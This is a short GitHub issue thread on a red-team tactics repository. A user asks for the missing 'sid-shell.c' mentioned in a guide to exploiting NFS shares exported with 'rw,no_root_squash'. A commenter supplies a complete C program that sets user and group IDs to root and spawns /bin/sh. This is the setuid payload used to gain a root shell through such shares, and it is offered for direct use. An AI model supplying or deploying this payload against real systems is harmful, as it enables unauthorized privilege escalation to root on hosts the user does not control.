### ISSUE TITLE
Where is sid-shell.c

### ISSUE THREAD

**Issue by OlivierLaflamme** [mantvydasb/RedTeam-Tactics-and-Techniques#9]
Im sorry to anyone who has an email notif as a result.

In NFS Exported shares you say 
List NFS exported shares. If 'rw,no_root_squash' is present, upload and execute sid-shell

I'd like to get the code for sid-shell as the link https://github.com/mantvydasb/Offensive-Security-Cheatsheets/blob/master/sid-shell.c is dead. 

where could i find this c code im not finding the proper CVE online. 

Thanks, sorry for the burden.

**Comment by kernel-sanders** [comment]
No idea if it is the original sid-shell.c, but this is a variation that I use:

```
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
   setuid( 0 );
   seteuid( 0 );
   setgid( 0 );
   setegid( 0 );
   system( "/bin/sh" );

   return 0;
}
```

**Comment by OlivierLaflamme** [comment]
thank you!
